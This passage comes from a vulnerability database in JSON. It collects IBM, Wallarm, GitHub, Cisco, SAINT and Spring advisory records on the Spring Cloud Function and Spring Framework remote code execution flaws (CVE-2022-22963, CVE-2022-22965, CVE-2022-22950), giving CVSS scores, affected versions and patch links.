TPS\"},\"Product\":{\"code\":\"SS6PEW\",\"label\":\"Sterling Order Management\"},\"ARM Category\":[{\"code\":\"a8m0z000000cy00AAA\",\"label\":\"Orders\"}],\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"All Versions\"}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-28T19:47:33", "type": "ibm", "title": "Security Bulletin: Sterling Order Management and Spring vulnerability CVE-2022-22963", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-07-28T19:47:33", "id": "EBFFCC00EDD65F45E051073EAF518CD443503E46CC247513E4B973ECC7C31531", "href": "https://www.ibm.com/support/pages/node/6600077", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-24T05:54:34", "description": "## Summary\n\nCMIS is affected since it uses SpringFramework, but not vulnerable to [CVE-2022-22965] and [CVE-2022-22963].\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM ECM CMIS and FileNet Collaboration Services| 3.0.6 \nCP4BA| 21.0.3 \nCP4BA| 22.0.1 \n \n\n\n## Remediation/Fixes\n\nCMIS has upgraded to SpringFramework version 5.3.18 in the below releases. \n \n\n\nProduct| VRMF| Remediation/First Fix \n---|---|--- \nIBM ECM CMIS and FileNet Collaboration Services| 3.0.6.0| [CMIS 3.0.6-IF2](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise%20Content%20Management&product=ibm/Other+software/Content+Navigator&release=3.0.6&platform=All&function=all> \"CMIS 3.0.6-IF2\" ) \\- 8/2/2022 \nCP4BA| 21.0.3.0| [CP4BA 21.0.3-IF12](<https://www.ibm.com/support/pages/node/6612563> \"CP4BA 21.0.3-IF12\" ) \\- 9/1/2022 \nCP4BA| 22.0.1.0| [CP4BA 22.0.1-IF2](<https://www.ibm.com/support/pages/node/6612561> \"CP4BA 22.0.1-IF2\" ) \\- 9/2/2022 \n \n \n \n\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-18T15:36:16", "type": "ibm", "title": "Security Bulletin: CMIS is affected since it uses Spring Framework, but not vulnerable to [CVE-2022-22965] and [CVE-2022-22963]", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-10-18T15:36:16", "id": "5303EB56B374789D2F25DD42CDE200B10A36458869D3BC5FB7882728637FFBF5", "href": "https://www.ibm.com/support/pages/node/6830265", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-24T06:03:09", "description": "## Summary\n\nIBM QRadar SIEM is affected but not vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. QVM utilizes the Spring Framework to support our Java backed user interface.. The fix includes Spring 5.3.18.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22963](<https://vulners.com/cve/CVE-2022-22963>) \n** DESCRIPTION: **VMware Spring Cloud Function could allow a remote attacker to execute arbitrary code on the system, caused by an error when using the routing functionality. By providing a specially crafted SpEL as a routing-expression, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223020](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223020>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2022-22950](<https://vulners.com/cve/CVE-2022-22950>) \n** DESCRIPTION: **VMware Tanzu Spring Framework is vulnerable to a denial of service, caused by improper input validation. By sending a specially-crafted crafted SpEL expression, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 5.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223096](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223096>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nQRadar / QRM / QVM / QRIF / QNI v7.3| 7.3.0 - 7.3.3 Fix Pack 11 \nQRadar / QRM / QVM / QRIF / QNI v7.4| 7.4.0 - 7.4.3 Fix Pack 5 \nQRadar / QRM / QVM / QRIF / QNI v7.5| 7.5.0 - 7.5.0 Update Package 1 \n \n \n\n\n## Remediation/Fixes\n\nIBM encourages customers to update their systems promptly. \n\n**Product**| **Versions**| **Fix** \n---|---|--- \nQRadar / QRM / QVM / QRIF / QNI| 7.3| [7.3.3 Fix Pack 11 Interim Fix 01](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+SIEM&release=All&platform=Linux&function=fixId&fixids=7.3.3-QRADAR-QRSIEM-20220517151911INT&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"7.3.3 Fix Pack 11 Interim Fix 01\" ) \nQRadar / QRM / QVM / QRIF / QNI| 7.4| [7.4.3 Fix Pack 6](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+SIEM&release=All&platform=Linux&function=fixId&fixids=7.4.3-QRADAR-QRSIEM-20220531120920&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"7.4.3 Fix Pack 6\" ) \nQRadar / QRM / QVM / QRIF / QNI| 7.5| [7.5.0 Update Package 2](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+SIEM&release=All&platform=Linux&function=fixId&fixids=7.5.0-QRADAR-QRSIEM-20220527130137&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"7.5.0 Update Package 2\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-24T17:34:09", "type": "ibm", "title": "Security Bulletin: IBM QRadar SIEM is affected by a remote code execution in Spring Framework (CVE-2022-22963, CVE-2022-22965, CVE-2022-22950)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22950", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-06-24T17:34:09", "id": "C0904FD149C70D8A2835DB923B2BF04803388EF83CB969D07F28836C567C672B", "href": "https://www.ibm.com/support/pages/node/6598419", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-24T06:05:52", "description": "## Summary\n\nIBM Watson Discovery for IBM Cloud Pak for Data is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. Spring is used for internal services. The fix includes Spring 5.3.18.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22950](<https://vulners.com/cve/CVE-2022-22950>) \n** DESCRIPTION: **VMware Tanzu Spring Framework is vulnerable to a denial of service, caused by improper input validation. By sending a specially-crafted crafted SpEL expression, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 5.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223096](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223096>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L) \n \n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2022-22963](<https://vulners.com/cve/CVE-2022-22963>) \n** DESCRIPTION: **VMware Spring Cloud Function could allow a remote attacker to execute arbitrary code on the system, caused by an error when using the routing functionality. By providing a specially crafted SpEL as a routing-expression, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223020](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223020>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nWatson Discovery| 4.0.0-4.0.7 \nWatson Discovery| 2.0.0-2.2.1 \n \n\n\n## Remediation/Fixes\n\nUpgrade to IBM Watson Discovery 4.0.8 \n\nUpgrade to IBM Watson Discovery 2.2.1 and apply cpd-watson-discovery-2.2.1-patch-10\n\n<https://cloud.ibm.com/docs/discovery-data?topic=discovery-data-install>\n\n<https://www.ibm.com/support/pages/available-patches-watson-discovery-ibm-cloud-pak-data>\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-27T14:54:28", "type": "ibm", "title": "Security Bulletin: IBM Watson Discovery for IBM Cloud Pak for Data is affected by a remote code execution in Spring Framework (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22950", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-27T14:54:28", "id": "370CF55655D0DCE5B827E549AA74D877B1D4BA2D531AAEFFDF0A6CA27218326F", "href": "https://www.ibm.com/support/pages/node/6570949", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "wallarmlab": [{"lastseen": "2022-04-06T16:47:27", "description": "**Quick update**\n\n * There are two vulnerabilities: one 0-day in Spring Core which is named Spring4Shell (very severe, exploited in the wild no CVE yet) and another one in Spring Cloud Function (less severe, [CVE-2022-22963](<https://tanzu.vmware.com/security/cve-2022-22963>))\n * Wallarm has rolled out the update to detect and mitigate both vulnerabilities\n * No additional actions are required from the customers when using Wallarm in blocking mode\n * When working in a monitoring mode, consider [creating a virtual patch](<https://docs.wallarm.com/user-guides/rules/regex-rule/#example-block-all-requests-with-the-classmoduleclassloader-body-parameters>)\n\n## **Spring4Shell**\n\nSpring Framework is an extremely popular framework used by Java developers to build modern applications. If you rely on the Java stack it\u2019s highly likely that your engineering teams use Spring. In some cases, it only takes one specially crafted request to exploit the vulnerability.\n\nOn March 29th, 2022, information about the POC 0-day exploit in the popular Java library Spring Core appeared on Twitter. Later it turned out that it\u2019s two RCEs that are discussed and sometimes confused:\n\n * RCE in "Spring Core" (Severe, no patch at the moment) - Spring4Shell\n * RCE in "Spring Cloud Function" (Less severe, [see the CVE](<https://tanzu.vmware.com/security/cve-2022-22963>))\n\nThe vulnerability allows an unauthenticated attacker to execute arbitrary code on the target system. Within some configurations, it only requires a threat actor to send a specific HTTP request to a vulnerable system. Other configurations may require additional effort and research by the attacker\n\nAt the time of writing, Spring4Shell is unpatched in the Spring Framework and there is a public proof-of-concept available. We see exploits in the wild.\n\n**Wallarm update** \n[Wallarm](<https://www.wallarm.com/>) automatically identifies attempts of the Spring4Shell exploitation and logs these attempts in the Wallarm Console.\n\n**Mitigation** \nWhen using Wallarm in blocking mode, these attacks will be automatically blocked. No actions are required.\n\nWhen using a monitoring mode, we suggest creating a virtual patch. Feel free to reach out to [support@wallarm.com](<mailto:support@wallarm.com>) if you need assistance.\n\nThe post [Update on 0-day vulnerabilities in Spring (Spring4Shell and CVE-2022-22963)](<https://lab.wallarm.com/update-on-0-day-vulnerabilities-in-spring-spring4shell-and-cve-2022-22963/>) appeared first on [Wallarm](<https://lab.wallarm.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T01:49:02", "type": "wallarmlab", "title": "Update on 0-day vulnerabilities in Spring (Spring4Shell and CVE-2022-22963)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-03-31T01:49:02", "id": "WALLARMLAB:9178CD01A603571D2C21329BF42F9BFD", "href": "https://lab.wallarm.com/update-on-0-day-vulnerabilities-in-spring-spring4shell-and-cve-2022-22963/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "github": [{"lastseen": "2023-07-21T20:26:42", "description": "In Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions, when using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-03T00:00:59", "type": "github", "title": "Spring Cloud Function Code Injection with a specially crafted SpEL as a routing expression", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2023-07-14T13:41:39", "id": "GHSA-6V73-FGF6-W5J7", "href": "https://github.com/advisories/GHSA-6v73-fgf6-w5j7", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "prion": [{"lastseen": "2023-08-15T15:52:17", "description": "In Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions, when using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T23:15:00", "type": "prion", "title": "CVE-2022-22963", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2023-07-13T23:15:00", "id": "PRION:CVE-2022-22963", "href": "https://kb.prio-n.com/vulnerability/CVE-2022-22963", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "saint": [{"lastseen": "2023-07-26T12:32:07", "description": "Added: 04/05/2022 \n\n\n### Background\n\n[Spring Cloud Function](<https://spring.io/projects/spring-cloud-function#overview>) abstracts all transport details and infrastructure, allowing developers to keep all familiar tools and processes and focus on business logic. \n\n### Problem\n\nSpring Cloud Function has remote code execution vulnerability. An attacker could provide a crafted Spring Expression language (SpEL) as a routing-expression that may result in access to local resources. \n\n### Resolution\n\nApply the patch referenced in the [CVE-2022-22963](<https://tanzu.vmware.com/security/cve-2022-22963>). \n\n### References\n\n<https://tanzu.vmware.com/security/cve-2022-22963> \n\n\n### Limitations\n\n### Platforms\n\nWindows \nLinux \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-05T00:00:00", "type": "saint", "title": "Spring Cloud Function Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-04-05T00:00:00", "id": "SAINT:ACED9607933F401D5B0A59CB25D22B09", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/spring_cloud_function_rce", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-07-21T18:40:39", "description": "Added: 04/05/2022 \n\n\n### Background\n\n[Spring Cloud Function](<https://spring.io/projects/spring-cloud-function#overview>) abstracts all transport details and infrastructure, allowing developers to keep all familiar tools and processes and focus on business logic. \n\n### Problem\n\nSpring Cloud Function has remote code execution vulnerability. An attacker could provide a crafted Spring Expression language (SpEL) as a routing-expression that may result in access to local resources. \n\n### Resolution\n\nApply the patch referenced in the [CVE-2022-22963](<https://tanzu.vmware.com/security/cve-2022-22963>). \n\n### References\n\n<https://tanzu.vmware.com/security/cve-2022-22963> \n\n\n### Limitations\n\n### Platforms\n\nWindows \nLinux \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-05T00:00:00", "type": "saint", "title": "Spring Cloud Function Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-04-05T00:00:00", "id": "SAINT:EA21934BE7986CEF27E73EAA38D7EB58", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/spring_cloud_function_rce", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisco": [{"lastseen": "2023-06-24T08:26:39", "description": "On March 29, 2022, the following critical vulnerability in the Spring Cloud Function Framework affecting releases 3.1.6, 3.2.2, and older unsupported releases was disclosed:\n\nCVE-2022-22963: Remote code execution in Spring Cloud Function by malicious Spring Expression\n\nFor a description of this vulnerability, see VMware Spring Framework Security Vulnerability Report [\"https://tanzu.vmware.com/security/cve-2022-22963\"].\n\nCisco's Response to This Vulnerability\n\nCisco accessed all products for impact from CVE-2022-22963. To help detect exploitation of this vulnerability, Cisco has released Snort rules at the following location: Talos Rule SID 59388 [\"https://www.snort.org/rule_docs/1-59388\"]\n\nThis advisory is available at the following link:\nhttps://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-java-spring-scf-rce-DQrHhJxH [\"https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-java-spring-scf-rce-DQrHhJxH\"]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T23:45:00", "type": "cisco", "title": "Vulnerability in Spring Cloud Function Framework Affecting Cisco Products: March 2022", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-04-15T15:31:28", "id": "CISCO-SA-JAVA-SPRING-SCF-RCE-DQRHHJXH", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-java-spring-scf-rce-DQrHhJxH", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "spring": [{"lastseen": "2022-04-27T14:58:04", "description": "We have released Spring Cloud Function [3.1.7](<https://repo.maven.apache.org/maven2/org/springframework/cloud/spring-cloud-function-context/3.1.7/>) & [3.2.3](<https://repo.maven.apache.org/maven2/org/springframework/cloud/spring-cloud-function-context/3.2.3/>) to address the following CVE report.\n\n * 